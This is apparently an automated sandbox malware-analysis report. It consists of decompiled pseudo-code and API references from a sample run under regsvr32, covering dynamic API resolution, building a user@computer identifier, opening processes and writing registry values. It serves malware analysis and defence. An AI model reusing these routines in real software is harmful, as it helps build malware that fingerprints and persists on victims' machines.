                                                                                                                                                                                                                                    								_t9 = _t36 + 0x23ee4d2; // 0x4e6c7452
                                                                                                                                                                                                                                    								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                                                                                                                    								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                                                    								if(_t38 == 0) {
                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t39 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    									_t11 = _t39 + 0x23ee779; // 0x6c43775a
                                                                                                                                                                                                                                    									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                                                                                                                    									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                                                    									if(_t41 == 0) {
                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                                                    										_t44 = E023E727B(_t54, _a8);
                                                                                                                                                                                                                                    										_v8 = _t44;
                                                                                                                                                                                                                                    										if(_t44 != 0) {
                                                                                                                                                                                                                                    											goto L8;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											 *_a12 = _t54;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                    			}



















APIs
  • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
• GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,023E207A,?,00000001,?,?,00000000,00000000), ref: 023E6951
• GetProcAddress.KERNEL32(00000000,7243775A), ref: 023E6973
• GetProcAddress.KERNEL32(00000000,614D775A), ref: 023E6989
• GetProcAddress.KERNEL32(00000000,6E55775A), ref: 023E699F
• GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 023E69B5
• GetProcAddress.KERNEL32(00000000,6C43775A), ref: 023E69CB
  • Part of subcall function 023E727B: memset.NTDLL ref: 023E72FA
Memory Dump Source
• Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
• Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
• Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
• Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
Similarity
• API ID: AddressProc$AllocateHandleHeapModulememset
• String ID:
• API String ID: 1886625739-0
• Opcode ID: ff5edbcd6f403212deb4f6f8db62b8b627aed2e1ea1fe4b8099696b71409f0dd
• Instruction ID: 273410ddcb5c3b65178c80b7bc893fe018b8c62b97bd832748223e89008c992e
• Opcode Fuzzy Hash: ff5edbcd6f403212deb4f6f8db62b8b627aed2e1ea1fe4b8099696b71409f0dd
• Instruction Fuzzy Hash: DB2151F1A4121ADFDF20DFA9D845E6A77FCEB18354B024526E605DB2C1D731EA098F60
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E7649() {
                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                    				int _v16;
                                                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                                                    				long _t43;
                                                                                                                                                                                                                                    				signed int _t47;
                                                                                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                                                                                    				int _t56;
                                                                                                                                                                                                                                    				int _t57;
                                                                                                                                                                                                                                    				char* _t63;
                                                                                                                                                                                                                                    				short* _t66;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                    				GetUserNameW(0,  &_v8);
                                                                                                                                                                                                                                    				_t39 = _v8;
                                                                                                                                                                                                                                    				if(_t39 != 0) {
                                                                                                                                                                                                                                    					_v12 = _t39;
                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                    					GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                    					_t43 = _v8;
                                                                                                                                                                                                                                    					if(_t43 != 0) {
                                                                                                                                                                                                                                    						_v12 = _v12 + _t43 + 2;
                                                                                                                                                                                                                                    						_t63 = E023E2049(_v12 + _t43 + 2 << 2);
                                                                                                                                                                                                                                    						if(_t63 != 0) {
                                                                                                                                                                                                                                    							_t47 = _v12;
                                                                                                                                                                                                                                    							_t66 = _t63 + _t47 * 2;
                                                                                                                                                                                                                                    							_v8 = _t47;
                                                                                                                                                                                                                                    							if(GetUserNameW(_t66,  &_v8) == 0) {
                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                    								E023E9039(_t63);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                                                                                                                                                                                                                                    								_t52 = _v8;
                                                                                                                                                                                                                                    								_v12 = _v12 - _t52;
                                                                                                                                                                                                                                    								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                                                                                                                                                                                                                                    									goto L7;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t56 = _v12 + _v8;
                                                                                                                                                                                                                                    									_t31 = _t56 + 2; // 0x23ea33a
                                                                                                                                                                                                                                    									_v12 = _t56;
                                                                                                                                                                                                                                    									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
                                                                                                                                                                                                                                    									_v8 = _t57;
                                                                                                                                                                                                                                    									if(_t57 == 0) {
                                                                                                                                                                                                                                    										goto L7;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t63[_t57] = 0;
                                                                                                                                                                                                                                    										_v16 = _t63;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,023EA338), ref: 023E765D
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,023EA338), ref: 023E7679
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,023EA338), ref: 023E76B3
                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(023EA338,?), ref: 023E76D5
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,023EA338,00000000,023EA33A,00000000,00000000,?,?,023EA338), ref: 023E76F8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3850880919-0
                                                                                                                                                                                                                                    • Opcode ID: 107f7af8cfc7ea7641ce9cd02f75724884624f1822fe64f62d724d9fdefe08c8
                                                                                                                                                                                                                                    • Instruction ID: c91ffb173172035f8d7820ce50232fa293ec24289f470305704b03189490925a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 107f7af8cfc7ea7641ce9cd02f75724884624f1822fe64f62d724d9fdefe08c8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9021BAB5900219EBCF11DFA9D985CAEBBBCEF44344B54446AE502E7280D7349F49DB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                    			E023E1585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				long _t10;
                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t9 = __eax;
                                                                                                                                                                                                                                    				_t22 = __eax;
                                                                                                                                                                                                                                    				if(_a4 != 0 && E023E7F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t10 = E023EA9AB(_t9, _t18, _t22, _a8);
                                                                                                                                                                                                                                    				if(_t10 == 0) {
                                                                                                                                                                                                                                    					ResetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                                                                    					ResetEvent( *(_t22 + 0x20));
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0xffffffff);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                                                                                                                                                                                                    					if( *0x23ed130() != 0) {
                                                                                                                                                                                                                                    						SetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t10 = GetLastError();
                                                                                                                                                                                                                                    						if(_t10 == 0x3e5) {
                                                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                                                    							_t10 = 0;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t10 == 0xffffffff) {
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t10;
                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,023E11DA,?,?,00000000,00000000), ref: 023E15BF
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 023E15C4
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023E15DC
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000102,023E11DA,?,?,00000000,00000000), ref: 023E15F7
                                                                                                                                                                                                                                      • Part of subcall function 023E7F27: lstrlen.KERNEL32(00000000,00000008,?,76D24D40,?,?,023E15A4,?,?,?,?,00000102,023E11DA,?,?,00000000), ref: 023E7F33
                                                                                                                                                                                                                                      • Part of subcall function 023E7F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,023E15A4,?,?,?,?,00000102,023E11DA,?), ref: 023E7F91
                                                                                                                                                                                                                                      • Part of subcall function 023E7F27: lstrcpy.KERNEL32(00000000,00000000), ref: 023E7FA1
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 023E15EA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1449191863-0
                                                                                                                                                                                                                                    • Opcode ID: ae98621ddc8639946fec08c54644d1a3764f297b462dc362ab2fa24d35fcce97
                                                                                                                                                                                                                                    • Instruction ID: a968ef9de865c49145b2bd476d6cf1b96274f024ab70e232a92308ce73e00b5e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae98621ddc8639946fec08c54644d1a3764f297b462dc362ab2fa24d35fcce97
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B016D71540721ABDE31AB21DC44B1FB6A9FF48364F104E2AF5ABA10E0DB30EC5DDA21
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E8F10(intOrPtr _a4) {
                                                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                                                    				void* _t5;
                                                                                                                                                                                                                                    				long _t6;
                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                    				 *0x23ed26c = _t2;
                                                                                                                                                                                                                                    				if(_t2 == 0) {
                                                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t4 = GetVersion();
                                                                                                                                                                                                                                    				if(_t4 != 5) {
                                                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                                                    					if(_t13 <= 0) {
                                                                                                                                                                                                                                    						_t5 = 0x32;
                                                                                                                                                                                                                                    						return _t5;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                    					 *0x23ed25c = _t4;
                                                                                                                                                                                                                                    					_t6 = GetCurrentProcessId();
                                                                                                                                                                                                                                    					 *0x23ed258 = _t6;
                                                                                                                                                                                                                                    					 *0x23ed264 = _a4;
                                                                                                                                                                                                                                    					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                                                                                                                    					 *0x23ed254 = _t7;
                                                                                                                                                                                                                                    					if(_t7 == 0) {
                                                                                                                                                                                                                                    						 *0x23ed254 =  *0x23ed254 | 0xffffffff;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t4 > 0) {
                                                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t13 = _t4 - _t4;
                                                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,023E6A90,?,?,00000001,?,?,?,023E807D,?), ref: 023E8F18
                                                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000001,?,?,?,023E807D,?), ref: 023E8F27
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,023E807D,?), ref: 023E8F3E
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,023E807D,?), ref: 023E8F5B
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000001,?,?,?,023E807D,?), ref: 023E8F7A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2270775618-0
                                                                                                                                                                                                                                    • Opcode ID: 5169b0deb4676a493d17fc72ee169744c6980e0d16a43ee5e7bbcdedffa00548
                                                                                                                                                                                                                                    • Instruction ID: b04f46c20c6b8323af082a73a3e2c4eb33590e8dea9bea53fecfdb0a9031e5c8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5169b0deb4676a493d17fc72ee169744c6980e0d16a43ee5e7bbcdedffa00548
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0F019B0EE4315DAEF308F64A909B183B6EA744791F004D1AE552CA1E0D771D46ECA16
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                    			E023E17D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				signed int* _v16;
                                                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				char* _t60;
                                                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                                                    				char _t68;
                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                                                    				void* _t98;
                                                                                                                                                                                                                                    				char _t104;
                                                                                                                                                                                                                                    				signed int* _t106;
                                                                                                                                                                                                                                    				intOrPtr* _t107;
                                                                                                                                                                                                                                    				void* _t108;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t98 = __ecx;
                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                    				_t104 = _a16;
                                                                                                                                                                                                                                    				if(_t104 == 0) {
                                                                                                                                                                                                                                    					__imp__( &_v284,  *0x23ed33c);
                                                                                                                                                                                                                                    					_t97 = 0x80000002;
                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                    					_t60 = E023E809F(0,  &_v284);
                                                                                                                                                                                                                                    					_a8 = _t60;
                                                                                                                                                                                                                                    					if(_t60 == 0) {
                                                                                                                                                                                                                                    						_v8 = 8;
                                                                                                                                                                                                                                    						L29:
                                                                                                                                                                                                                                    						_t61 = _a20;
                                                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                                                    							 *_t61 =  *_t61 + 1;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						return _v8;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t107 = _a24;
                                                                                                                                                                                                                                    					if(E023E88B7(_t98, _t103, _t107, _t97, _t60) != 0) {
                                                                                                                                                                                                                                    						L27:
                                                                                                                                                                                                                                    						E023E9039(_a8);
                                                                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t65 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    					_t16 = _t65 + 0x23ee8fe; // 0x65696c43
                                                                                                                                                                                                                                    					_t68 = E023E809F(0, _t16);
                                                                                                                                                                                                                                    					_a24 = _t68;
                                                                                                                                                                                                                                    					if(_t68 == 0) {
                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                    						_t29 = _t107 + 0x14; // 0x102
                                                                                                                                                                                                                                    						_t33 = _t107 + 0x10; // 0x3d023ec0
                                                                                                                                                                                                                                    						if(E023EA635(_t103,  *_t33, _t97, _a8,  *0x23ed334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                                                                                                                                                                                                    							_t72 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    							if(_t104 == 0) {
                                                                                                                                                                                                                                    								_t35 = _t72 + 0x23eea5f; // 0x4d4c4b48
                                                                                                                                                                                                                                    								_t73 = _t35;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t34 = _t72 + 0x23ee89f; // 0x55434b48
                                                                                                                                                                                                                                    								_t73 = _t34;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							if(E023E816C(_t73,  *0x23ed334,  *0x23ed338,  &_a24,  &_a16) == 0) {
                                                                                                                                                                                                                                    								if(_t104 == 0) {
                                                                                                                                                                                                                                    									_t75 =  *0x23ed27c; // 0x28da5a8
                                                                                                                                                                                                                                    									_t44 = _t75 + 0x23ee871; // 0x74666f53
                                                                                                                                                                                                                                    									_t78 = E023E809F(0, _t44);
                                                                                                                                                                                                                                    									_t105 = _t78;
                                                                                                                                                                                                                                    									if(_t78 == 0) {
                                                                                                                                                                                                                                    										_v8 = 8;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t47 = _t107 + 0x10; // 0x3d023ec0
                                                                                                                                                                                                                                    										E023E2659( *_t47, _t97, _a8,  *0x23ed338, _a24);
                                                                                                                                                                                                                                    										_t49 = _t107 + 0x10; // 0x3d023ec0
                                                                                                                                                                                                                                    										E023E2659( *_t49, _t97, _t105,  *0x23ed330, _a16);
                                                                                                                                                                                                                                    										E023E9039(_t105);
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t40 = _t107 + 0x10; // 0x3d023ec0
                                                                                                                                                                                                                                    									E023E2659( *_t40, _t97, _a8,  *0x23ed338, _a24);
                                                                                                                                                                                                                                    									_t43 = _t107 + 0x10; // 0x3d023ec0
                                                                                                                                                                                                                                    									E023E2659( *_t43, _t97, _a8,  *0x23ed330, _a16);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								if( *_t107 != 0) {
                                                                                                                                                                                                                                    									E023E9039(_a24);
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									 *_t107 = _a16;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L27;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t21 = _t107 + 0x10; // 0x3d023ec0
                                                                                                                                                                                                                                    					if(E023E6BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                                                                                                                                                                                                    						_t106 = _v16;
                                                                                                                                                                                                                                    						_t88 = 0x28;
                                                                                                                                                                                                                                    						if(_v12 == _t88) {
                                                                                                                                                                                                                                    							 *_t106 =  *_t106 & 0x00000000;
                                                                                                                                                                                                                                    							_t26 = _t107 + 0x10; // 0x3d023ec0
                                                                                                                                                                                                                                    							E023EA635(_t103,  *_t26, _t97, _a8, _a24, _t106);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						E023E9039(_t106);
                                                                                                                                                                                                                                    						_t104 = _a16;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E023E9039(_a24);
                                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                                                                                                                                    					goto L29;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t103 = _a8;
                                                                                                                                                                                                                                    					E023EA8D8(_t104, _a8,  &_v284);
                                                                                                                                                                                                                                    					__imp__(_t108 + _t104 - 0x117,  *0x23ed33c);
                                                                                                                                                                                                                                    					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
                                                                                                                                                                                                                                    					_t97 = 0x80000003;
                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                    0x023e18e4
                                                                                                                                                                                                                                    0x023e18e4
                                                                                                                                                                                                                                    0x023e18ea
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e18ea
                                                                                                                                                                                                                                    0x023e17ef
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e1816
                                                                                                                                                                                                                                    0x023e1816
                                                                                                                                                                                                                                    0x023e1822
                                                                                                                                                                                                                                    0x023e1835
                                                                                                                                                                                                                                    0x023e183b
                                                                                                                                                                                                                                    0x023e1843
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e1843

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(023E3C81,0000005F,00000000,00000000,00000104), ref: 023E1808
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 023E1835
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: lstrlen.KERNEL32(?,00000000,023ED330,00000001,023E2200,023ED00C,023ED00C,00000000,00000005,00000000,00000000,?,?,?,023E96C1,023E23E9), ref: 023E80A8
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: mbstowcs.NTDLL ref: 023E80CF
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: memset.NTDLL ref: 023E80E1
                                                                                                                                                                                                                                      • Part of subcall function 023E2659: lstrlenW.KERNEL32(023E3C81,?,?,023E19A9,3D023EC0,80000002,023E3C81,023E8B1E,74666F53,4D4C4B48,023E8B1E,?,3D023EC0,80000002,023E3C81,?), ref: 023E2679
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 023E1857
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                                                                                                                    • String ID: \
                                                                                                                                                                                                                                    • API String ID: 3924217599-2967466578
                                                                                                                                                                                                                                    • Opcode ID: b3af76fd2635bd0f2b61ca21272c442feaceaf1f0e919724f5ef41274732dad1
                                                                                                                                                                                                                                    • Instruction ID: fcd260c9eca5ad7eb5e1e168c8ff98b02e56999850b8ff674cd3275589444f66
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3af76fd2635bd0f2b61ca21272c442feaceaf1f0e919724f5ef41274732dad1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 435139B2500219EFDF219FA0DD40EAA37BEBB18314F008915FA6A965A0D731ED2DDF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                    			E023E52F9(intOrPtr* __eax) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				WCHAR* _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                    				short _v48;
                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                    				short _v64;
                                                                                                                                                                                                                                    				intOrPtr* _t54;
                                                                                                                                                                                                                                    				intOrPtr* _t56;
                                                                                                                                                                                                                                    				intOrPtr _t57;
